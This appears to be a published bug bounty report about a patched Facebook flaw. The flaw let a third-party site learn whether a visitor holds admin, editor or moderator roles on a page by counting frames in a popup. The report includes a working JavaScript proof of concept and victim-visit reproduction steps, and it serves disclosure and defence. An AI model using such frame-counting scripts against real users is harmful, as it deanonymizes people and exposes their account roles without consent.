Richard Telleng

Published On: 02 Jul 2019

$750

Disclose facebook user page roles (Admin/Editor/Mod)

Identification/Deanonymization
Facebook | Web
---
LOW VALID

I was reading this blog post https://www.imperva.com/blog/facebook-privacy-bug/ and try to find facebook endpoint which reflect the javascript frames.length (number of iframe) > 0

Description

I've found if the user who have permission to access https://web.facebook.com/[page_username]/inbox i get : frames.length = 1 when there is no message in page inbox frames.length = 3 when the inbox contain a message and if the user doesnt have permission to read the page inbox in the page then it will throw an error page which had a frames.length = 0. `

Impact

This bug allow attacker to identify the facebook user who have admin/editor/mod roles in a page.




Reproduction Steps

Step
1

Here is the script :

<script>
function test()
{
page = "Your Page Username"
"
h = 1;
w = 1;
t=window.innerHeight-h
l=window.innerWidth-w
if (fb === undefined) {
var fb = window.open("","","height="+h+",width="+w+",left="+l+",top="+t)
console.log(fb === undefined)
 
}
 
fb.location = "https://web.facebook.com/"+page+"/inbox/";
setTimeout(function ()
{
var answer = fb.frames.length == 0 ? 'No' : 'Yes';
var a = fb.frames.length > 1 ? 'No' : "Yes";
console.log('Are you an Admin/Editor/Moderator in : ' + page + ' ? -- ' + answer+' Mailbox Empty ? -- '+a)
fb.close()
},5000);
}
 
</script>

Step
2

Change the page variable and as a victim, visit the website that have a script above.

Step
3

The console should tell you the result whether the user have a page admin/editor/moderator role in the page that you define in page variable.

Videos

Timeline
.
Richard 20 May 2019

Initial Report

.
Facebook 23 May 2019

Pre-Triaged Hi Richard, Thank you for your submission. We've managed to reproduce your report and will get back to you once we have had a chance to investi ... See More

.
Facebook 30 May 2019

Triaged Hi Richard, Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will ... See More

.
Facebook 11 Jun 2019

Fixed Hi Richard, We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch ... See More

.
Richard 11 Jun 2019

Confirmation

.
Facebook 21 Jun 2019

Bounty Awarded Hi Richard Telleng, After reviewing this issue, we have decided to award you a bounty of $750. Below is an explanation of the bounty amount. Fac ... See More

VALID






Show All Images